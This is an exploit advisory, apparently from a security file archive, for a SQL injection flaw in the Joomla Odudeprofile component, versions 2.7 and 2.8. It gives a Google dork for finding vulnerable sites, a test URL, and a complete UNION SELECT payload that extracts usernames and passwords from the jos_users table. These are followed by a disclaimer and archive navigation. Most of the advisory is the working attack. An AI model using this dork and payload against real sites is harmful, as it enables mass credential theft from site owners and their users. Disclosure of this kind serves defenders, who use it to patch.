Joomla Odudeprofile 2.x SQL Injection

Joomla Odudeprofile 2.x SQL Injection: Posted Jul 25, 2012; Authored by Daniel Barragan; Joomla Odudeprofile component version 2.x suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 8b5536a92abeb5455576bdcda4e58fb09ea7f7b74b19c495050cdfec88ce5f79; Download | Favorite | View

Joomla Odudeprofile 2.x SQL Injection

______________________________________________________________________________________
 
 Exploit Title: Joomla com_odudeprofile V2.x Exploit

 Google Dork: inurl:index.php?option=com_odudeprofile

 Date: [24-07-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 site: http://poisonsecurity.wordpress.com/

 Vendor: http://www.odude.com

 Version: 2.7 & 2.8

 Download: http://www.odude.com/home/profile.html

 License: Non-Commercial
 
 Tested on: [Linux(arch)-Windows(7ultimate)]

______________________________________________________________________________________

  Test:

  http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=idtrue%27

    
  Sql:

  http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=(SQL) 


      DEMO1:

                     http://example.com/index.php?option=com_odudeprofile&view=search&profession=999999.9'%20union%20all%20select%20 0x31303235343830303536%2C(select%20concat(username,0x3D,password)%20from%20jos_users)%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R%20


     


Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"

Top Authors In Last 30 Days

Red Hat 248 files
Ubuntu 87 files
Gentoo 31 files
Debian 19 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 4 files
Google Security Research 3 files
jheysel-r7 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,080)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,409)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,312)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,667)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

Joomla Odudeprofile 2.x SQL Injection

Joomla Odudeprofile 2.x SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Odudeprofile 2.x SQL Injection

Share This

Joomla Odudeprofile 2.x SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems